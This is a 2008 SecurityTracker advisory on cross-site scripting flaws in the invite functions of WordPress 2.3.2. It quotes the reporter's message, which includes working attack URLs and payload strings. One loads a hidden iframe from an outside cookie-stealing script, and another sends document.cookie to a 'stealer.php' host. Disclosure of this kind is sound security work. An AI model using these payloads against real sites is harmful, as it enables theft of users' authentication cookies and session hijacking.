WordPress Input Validation Holes in Invite Function Permit Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1019564
|
|
SecurityTracker URL: http://securitytracker.com/id?1019564
|
|
CVE Reference: CVE-2008-1304
(Links to External Site)
|
Updated: Mar 19 2008
|
Original Entry Date: Mar 7 2008
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 2.3.2
|
Description: A vulnerability was reported in WordPress. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running the WordPress software and will run in the security context of that site.
As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with
the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the
target user.
The 'inviteemail' parameter of the invite function of the 'wp-admin/users.php' script is affected.
The 'to' parameter
of the 'wp-admin/invites.php' script is affected.
DoZ from Hackers Center Security Group reported this vulnerability.
The
original advisory is available at:
http://www.hackerscenter.com/index.php?/Latest-posts/114-WordPress-Multiple-Cross-Site-Scripting-Vulnerabilities.html?id=114
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
WordPress software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.wordpress.org/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: DoZ@HackersCenter.com
|
Message History:
None.
|
Source Message Contents
|
Date: 7 Mar 2008 03:50:36 -0000
From: DoZ@HackersCenter.com
Subject: WordPress Multiple Cross-Site Scripting Vulnerabilities
|
Vulnerabilities in Wordpress, which can be exploited by malicious people to conduct cross-site script
ing and script insertion attacks.Input
passed to certain parameters in various scripts isn't properly verified before it is returned to the
user. This can be exploited
to execute arbitrary HTML or script code in a user's browser session in context of an affected site
by tricking the user into visiting
a malicious website or follow a specially crafted link.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspect
ing user in the context of the
affected site. This may allow the attacker to steal cookie-based authentication credentials and to l
aunch other attacks.
Hackers Center Security Group (http://www.hackerscenter.com)
Credit: DoZ Class: Input Validation Error
Remote: Yes
Product: WordPress
Version: 2.3.2
Vendor: http://www.WordPress.com
Attackers can exploit these issues via a web client.
Url: (1 & 2)
1. Our Testing Example:
http://site.wordpress.com/wp-admin/users.php?update=invite&inviteemail=Attack_Code
Example of Attack String: ">< iframe src=http://members.lycos.co.uk/Account/CookieMonster.
php width=0 height=0>
< /script>
2. Our Testing Example: (Works If Admin is already logged in)
http://site.wordpress.com/wp-admin/invites.php?result=sent&to=%22%3E%3Cscript%3Ealert
(document.cookie);%3C/script%3E
Example of Attack String:
< script>document.location="http://www.mysite/stealer.php?cookie="+document.cookie;<
/script>
Refrence:
http://www.hackerscenter.com/index.php?/Latest-posts/114-WordPress-Multiple-Cross-Site-Scripting-Vuln
erabilities.html?id=114
Video:
http://www.hackerscenter.com/public/%5F/wordpress/Wordpress.html
|
|
